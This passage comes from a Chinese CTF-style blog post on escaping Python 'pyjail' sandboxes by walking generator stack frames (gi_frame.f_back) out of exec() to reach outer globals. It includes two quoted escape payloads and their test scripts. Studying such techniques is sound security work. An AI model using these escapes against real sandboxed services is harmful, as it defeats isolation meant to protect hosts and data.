
<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># True
# True
# Result: 15
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="生成器的栈帧"><span class="me-2">生成器的栈帧</span><a href="#生成器的栈帧" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>每次调用一个普通函数时，Python 会为该函数创建一个新的栈帧，并将其压入调用栈中。当函数执行完毕后，栈帧会被弹出。生成器的实现也使用到了栈帧，但不同的是，生成器可以暂停执行，并在恢复时继续从暂停的位置执行，也就意味着生成器的栈帧行为有所区别。</p>

<p>下面是一个测试示例：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>

<span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Generator started, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">1</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After first yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">2</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After second yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">3</span>

<span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>

<span class="c1"># 第一次调用 next()，启动生成器
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
# 第二次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
# 第三次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span>
<span class="c1"># Generator started, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 4, code my_generator&gt;
# 1
# After first yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 6, code my_generator&gt;
# 2
# After second yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 8, code my_generator&gt;
# 3
</span></pre></td></tr></tbody></table></code></div></div>
<p>每次调用 next() 时，生成器会从上次暂停的位置继续执行，并且它的栈帧保持不变。这表明，在整个生命周期中，生成器的栈帧一直存在，并且保存着它的状态。</p>

<p>我们可以使用 dir 函数来查看生成器的内容</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="n">g</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">])</span>
<span class="nf">dir</span><span class="p">(</span><span class="n">g</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__del__',
#  '__delattr__',
#  ... ,
#  'close',
#  'gi_code',
#  'gi_frame',
#  'gi_running',
#  'gi_suspended',
#  'gi_yieldfrom',
#  'send',
#  'throw']
</span><span class="n">g</span><span class="p">.</span><span class="n">gi_frame</span>  <span class="c1"># &lt;frame at 0x102bd4880, file '/code.py', line 1, code &lt;genexpr&gt;&gt;
</span></pre></td></tr></tbody></table></code></div></div>
<p>生成器对象自身也存在一些独有的属性，以 gi_开头:</p>
<ul>
  <li>gi_frame: gi_frame 就是生成器的栈帧，生成器每次执行，栈帧的地址保持不变。</li>
</ul>

<h3 id="生成器栈帧逃逸-payload"><span class="me-2">生成器栈帧逃逸 payload</span><a href="#生成器栈帧逃逸-payload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>下面是博客 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的一段抽象逻辑：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;&lt;用户提供的 Python 代码&gt;&gt;</span><span class="sh">"""</span>
<span class="p">...</span> <span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">)</span>
<span class="p">...</span> <span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p>用户的代码被丢进exec中执行。经过严格的过滤后，import、魔术方法、builtins 等沙箱逃逸的常用思路都会被堵死。这时候想要逃逸到 exec 环境之外拿到flag，甚至是 RCE，就需要通过栈帧回溯来实现。</p>

<h4 id="payload1"><span class="me-2">payload1</span><a href="#payload1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>文章 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的 payload 如下：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="p">[</span><span class="o">*</span><span class="n">q</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># g 现在是 exec 之外的栈帧的 globals 了
# g 是一个 dict，其中包含 flag 变量
</span></pre></td></tr></tbody></table></code></div></div>
<p>要理解上面的表达式，需要明白：</p>
<ol>
  <li>==生成器在初始化时并不会立即执行==。q 初始化之后并不会立即执行，而是到 [*q] 时才执行。因此乍一眼看有语法问题，q 并没有定义啊？但是当其执行时，q 已经是一个生成器对象了。</li>
  <li>f_back 属性用于访问调用栈中的前一个栈帧。</li>
</ol>

<p>因此：</p>
<ul>
  <li>q.gi_frame 是生成器对象 q 的当前栈帧。</li>
  <li>q.gi_frame.f_back 得到的是 exec 函数的栈帧，</li>
  <li>q.gi_frame.f_back.f_back 得到的就是全局栈帧了。</li>
  <li>q.gi_frame.f_back.f_back.f_globals 得到的就是 globals() 函数的内容。</li>
</ul>

<p>builtins 和 locals 也可以同理拿到。</p>

<p>作者提到为什么非得把 q.gi_frame 写在生成器里面？为什么不能写成下面这样：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span>
</pre></td></tr></tbody></table></code></div></div>

<p>原因在于只有在生成器运行过程中，q.gi_frame.f_back 才不为 None（CPython 中定义的逻辑）。即使 q 已经是一个生成器，但是由于并没有进行解包操作，生成器并没有运行，所以 q.gi_frame.f_back 始终为 None，如果没有解包的话，即使像上面那样写，结果也是 None。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span>
<span class="c1"># None
</span></pre></td></tr></tbody></table></code></div></div>

<p>测试脚本：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">q = (q.gi_frame.f_back.f_back.f_globals for _ in [1]);g = [*q][0];print(g)</span><span class="sh">"""</span>
<span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h4 id="payload2"><span class="me-2">payload2</span><a href="#payload2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p><a href="https://maplebacon.org/2024/02/dicectf2024-irs/">[DiceCTF 2024] IRS</a> 这篇博客也给出了一个生成器栈帧的 payload：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">f</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">x</span><span class="p">,</span> <span class="n">frame</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span>
    <span class="k">yield</span>
<span class="n">x</span> <span class="o">=</span> <span class="nf">f</span><span class="p">()</span>
<span class="n">x</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="bp">None</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>如何理解这段代码：</p>
<ol>
  <li>首先声明了一个生成器 f，
    <ol>
      <li>f 内部声明了全局变量 x 和 frame，意味着会在函数外部对其进行操作。</li>
    </ol>
  </li>
  <li>x = f() 会实例化一个生成器，但由于生成器的延迟加载，此时生成器不会执行。</li>
  <li>x.send(None)：这行代码启动了生成器，并让它执行到第一个 yield 语句。</li>
</ol>

<p>ps: 文章作者这段 payload 与上面那种 payload 的区别再于没有显示定一个生成器，AST 中不会出现 ast.GeneratorExp。</p>

<p>测试代码如下：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">'''</span><span class="s">
def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame.f_globals)
</span><span class="sh">'''</span>

<span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="csicn-2024-mossfern"><span class="me-2">CSICN 2024 mossfern</span><a href="#csicn-2024-mossfern" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h2 id="参考资料"><span class="me-2">参考资料</span><a href="#参考资料" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>[利用生成器栈帧逃逸 Pyjail</td>
          <td>CISCN 2024 mossfern 题解](https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern)</td>
        </tr>
      </tbody>
    </table></div>
  </li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/python/">Python</a>
      </div>
    
    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/pyjail/"
            class="post-tag no-text-decoration"
          >pyjail</a>
        
      </div>
    
    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
      <a href="https://twitter.com/intent/tweet?text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    
      <a href="https://www.facebook.com/sharer/sharer.php?title=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&u=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    
      <a href="https://t.me/share/url?url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F&text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    
    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->

  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        <li class="text-truncate lh-lg">
          <a href="/posts/phpggc-thinkphp-%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">phpggc thinkphp 利用链分析</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8/">php 反序列化利用</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A0%BC%E5%BC%8F%E5%9F%BA%E7%A1%80/">php 反序列化格式基础</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87/">php 反序列化绕过</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/">php 反序列化字符逃逸</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->

              <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

            </div>

  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->

<!-- An random integer that bigger than 0 -->

<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->

  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/QWB-2023-writeup/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1702981788"
  data-df="ll"
  
>
  Dec 19, 2023
</time>

              <h4 class="pt-0 my-2">QWB 2023 Writeup</h4>
              <div class="text-muted">
                <p>WEB
happygame
题目提供了一个 gRPC 服务。gRPC 是一个由 Google 初始开发的高性能、开源的远程过程调用（RPC）框架。网上已有不少针对 gRPC 的安全研究：

  【Black Hat Asia 2021系列分享】自动化挖掘 gRPC 网络接口漏洞
  gRPC内存马研究与查杀 - 先知社区

gRPC 框架如下所示：

可见服务端由 Java 编写。

针...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-04-%E7%BB%95%E8%BF%87%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-04 绕过多行限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过多行限制
绕过多行限制的利用手法通常在限制了单行代...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-03-%E7%BB%95%E8%BF%87%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-03 绕过命名空间限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过命名空间限制

部分限制
有些沙箱在构建时使用 e...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->

              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
    <a
      href="/posts/pyjail-bypass-10-%E7%BB%95%E8%BF%87-opcode-%E6%B2%99%E7%AE%B1/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>pyjail bypass-10 绕过 opcode 沙箱</p>
    </a>
  
    <a
      href="/posts/TPCTF-2025-web-writeup/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>TPCTF 2025 Web Writeup</p>
    </a>
  
</nav>

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

      <a href="https://twitter.com/DummyKitty">DummyKitty</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    <!-- Embedded scripts -->

      <!-- The comments switcher -->

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->

<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
